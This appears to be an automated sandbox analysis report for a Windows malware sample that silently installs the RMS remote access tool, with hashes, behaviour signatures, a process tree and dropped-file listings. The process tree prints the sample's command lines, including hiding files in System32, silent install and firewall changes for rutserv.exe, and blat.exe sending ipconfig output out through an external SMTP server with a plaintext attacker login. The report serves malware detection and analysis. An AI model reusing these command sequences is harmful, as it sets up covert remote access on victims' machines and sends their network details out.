Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
16-12-2024 00:18
General
-
Target
f6665ffcda974dd32f3ee0b6b803fd34_JaffaCakes118.exe
-
Size
1.7MB
-
MD5
f6665ffcda974dd32f3ee0b6b803fd34
-
SHA1
c03501cfe0652b14f0f5d4cea6ba47f00795c6b2
-
SHA256
7c2bb2e0ba7a643d2c39eea01a117edde0ebc23f42ca538030435305bb40035d
-
SHA512
d4c9bdb721502bafb4f063a6e6753fb83aee80ec1c2ef21cee503467257699d4dd2893a184204dcf69ca44267b634bee5557f24609f59a776627c6ecb3329489
-
SSDEEP
49152:QAJYXsQRx/EJUx6orYHmVW3TBtRaFvPpVHBbpQl:7JYXsQRx/Eux6or3ZvxVHBNQl
Malware Config
Signatures
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Rms family
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 10 IoCs
-
Loads dropped DLL 14 IoCs
-
Drops file in System32 directory 25 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies registry class 1 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 54 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6665ffcda974dd32f3ee0b6b803fd34_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f6665ffcda974dd32f3ee0b6b803fd34_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\stop.js"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\foto.exe"C:\Users\Admin\AppData\Local\Temp\foto.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B575.tmp\foto.bat" "4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s +r "C:\Windows\system32\HookDrv.dll"5⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s +r "C:\Windows\system32\rfusclient.exe"5⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s +r "C:\Windows\system32\rutserv.exe"5⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\rutserv.exe"rutserv.exe" /silentinstall5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\rutserv.exe"rutserv.exe" /firewall5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s set.reg5⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\rutserv.exe"rutserv.exe" /start5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\blat.exe"C:\Windows\system32\blat.exe" -install -server smtp.yandex.ru -port 587 -f [email protected] -u zverka2011 -pw 23dfgr5t45⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all5⤵
- System Location Discovery: System Language Discovery
- Gathers network information
-
-
C:\Windows\SysWOW64\findstr.exefindstr "IP" C:\Windows\system32\ip1.txt5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\blat.exe"C:\Windows\system32\blat.exe" "C:\Windows\system32\1.txt" -to [email protected]5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\rutserv.exeC:\Windows\SysWOW64\rutserv.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rfusclient.exeC:\Windows\SysWOW64\rfusclient.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rfusclient.exeC:\Windows\SysWOW64\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\rfusclient.exeC:\Windows\SysWOW64\rfusclient.exe /tray2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264B
MD5cd335f13d48e22f5da2f19acebb28832
SHA1333ff54eb67cff56740c37980e80e2815e64cc32
SHA2568c8ca694c2c731d61958e678d5761f74e0791630e42944b702bb21141c6a3442
SHA512a2f0560271405587cc09b5a7ab6e3ef183e8b381f639ba323c9e977ada6d5a5e68525649f5b15ca2ff2a51e9a3264d6adb697733608238020a2d591339503d61
-
Filesize
144KB
MD5513066a38057079e232f5f99baef2b94
SHA1a6da9e87415b8918447ec361ba98703d12b4ee76
SHA25602dbea75e8dbcdfc12c6b92a6c08efad83d4ca742ed7aee393ab26cab0c58f9e
SHA51283a074bef57f78ede2488dd586b963b92837e17eea77ebd1464f3da06954ae8ca07f040089af0c257e2836611ae39424574bd365aea4a6318a2707e031cd31a5
-
Filesize
120KB
MD5724cae63522f6e5f7565a3bf4b2a719b
SHA118620dbd4357d85918070f669ff4b61755290757
SHA256b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779
SHA512af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d
-
Filesize
112KB
MD531f84e433e8d1865e322998a41e6d90e
SHA1cbea6cda10db869636f57b1cffad39b22e6f7f17
SHA256aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e
SHA5127ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9
-
Filesize
2KB
MD53cd3cffda2b5108e2778f94429c624d6
SHA13e4d218d1b8eb4fa1ab5152b126951892aff3dc9
SHA256b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff
SHA512c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79
-
Filesize
1KB
MD5a9ebd254a2bb8318369fa9cd2b51e380
SHA145cf7b0f6b0b77325257abd184da293116c53eaa
SHA256c83af1f773cd73167b34eaa167cd58f0f2af335dfda6d5f8b6d0c43c1f30b3ea
SHA512a6ecc4a9fc6b5a7880a80fd622a2130ee39c90585af696b9efb6860ae43b48a981202d5ce9c7956f6b0208a9560e90ee1849418673a748e472ae4d78636daddc
-
Filesize
2.8MB
MD5f449d06b49e258b04bba5eaeab748aa2
SHA16de5e6fba23c681c949240f5435fba33e3034d27
SHA256c18c2bbafdab4e5974ede842bd4bd854deff9135356681ff84ba2f1c047e7c7a
SHA512b6441ae86e4f65e9d85a75312cc27e0bcc2992c89691be239e787ca28e69409a074e6ae0d1d45f518743fa60c664b85d120786dd57b6faf25bad6cb0b1a90e48
-
Filesize
3.2MB
MD511fe69e28c7fc7e975b6485520174de8
SHA1b2e6f974adcec6b18e54e27f83805d8ce3560dea
SHA2562d3c994449f1b13d55e22bbbae4bf36269f21a726c681271ecffc9fcab8f0425
SHA51225a05981afc787d48bd78a2e6a5df28040bb485fc18cccde68c9337597cabff5c70258bba7cbed802075800c9918664cadae775346887544ca7c9a3829f18aa9
-
Filesize
310KB
MD53f95a06f40eaf51b86cef2bf036ebd7a
SHA164009c5f79661eb2f82c9a76a843c0d3a856695d
SHA2561eb88258b18b215b44620326e35c90a8589f384710e7b2d61abf4f59203bd82d
SHA5126f28b5de28026319bed198f06b5461f688ca401129f1125e9e9d3b58956cc0d546234c2d202827bd74b99afd2ead958a863a520a1f4b7e599d385a8a67062897
-
Filesize
14KB
MD5b94278594be36c6ae537af5b89efdefd
SHA172ad6ae1559e4f5c06faf03de3a14821d235a1c1
SHA2566cdfa540814a1e394b4df4af42624998d830e6759f14b853893224ee1881426a
SHA512cbdedcc2345dcf3a72e051c75b1597b9388013dab3a7b7ecdb95d1e52240a6c4f5c2795d254e188714c10680f7b38adff50f2a8f6027f6a0eb882d6cce9bf80b
-
Filesize
1.6MB
MD5f24ceee8be72e2b171155e748a3ce8c2
SHA1233c2ed6e0dd3ca65027c0470f40ff7c0e4fc099
SHA256f669c7507500ac0117cfc5e4d8c9f01de7f2e656a0e1a47e790eb5895689b06a
SHA512061630ac6aab577f3eb4783a06694a3c607cefcebebe4f5553ed97da8aa6b945507f6f1600a50f2e98353e267fd35d6fb0e94ddd4d4e23fbb8e07a315ebd935f
-
Filesize
212B
MD5a3d0a0d32ce3c60f0b205d882435f8ac
SHA1b28bad3ef81216f14fd7a262a3ebc2258fcc7d9d
SHA256e7455abc7bdc2d705b007e9b0332e7c8d3793492f33324c7dd10b0a0513c2e3f
SHA512ea53f374b3291ec6ede586250ba787567c37c5f44014d347ac02612071c69f51e8499f2b26e6a7e957f5ca1749495f5c7398f479dd0dbe9bd29e95fa15843af9
-
Filesize
225B
MD5909903abb6efb1bb1020f8194cfdf50d
SHA10223f5d98f10397010ae32bd58c20322603a7aa8
SHA256de3df5736f91925632081d135371260295c6803bc61733b23b42986feba60010
SHA512d0e36930ecf65451cf2ba53e65dde08d8b294b75b5b68bb7492694d38607c113f402a9aa57b15eb6eb1fe0c6ece7aebd9b4986cf8e6f417fc51b3e374887124f
-
Filesize
1022B
MD53bf6ccf0908f040de60e32d73a6ddb49
SHA1bdd743027a20074c12efe841281ca091753b45f7
SHA2565d2d27c01b2726c19a1ba444ccbfda1dc02c5b7f20bf659cbd43cabb1d09c793
SHA512d28ba511c8e2ef48c37c4ff7ce4303f3643ceee1c816ab38e94288ffd49f87f528aa72dce5eb6d02eeb703c1f3646e68b6ff8367baed9f9a5ecbd163c8ed9a9c
-
Filesize
352KB
-
Filesize
3.3MB
-
Filesize
352KB
-
Filesize
3.3MB
-
Filesize
352KB
-
Filesize
3.3MB
-
Filesize
352KB
-
Filesize
3.8MB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
3.8MB
-
Filesize
3.8MB
-
Filesize
3.8MB
-
Filesize
352KB
-
Filesize
3.8MB
-
Filesize
352KB
-
Filesize
3.3MB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
3.8MB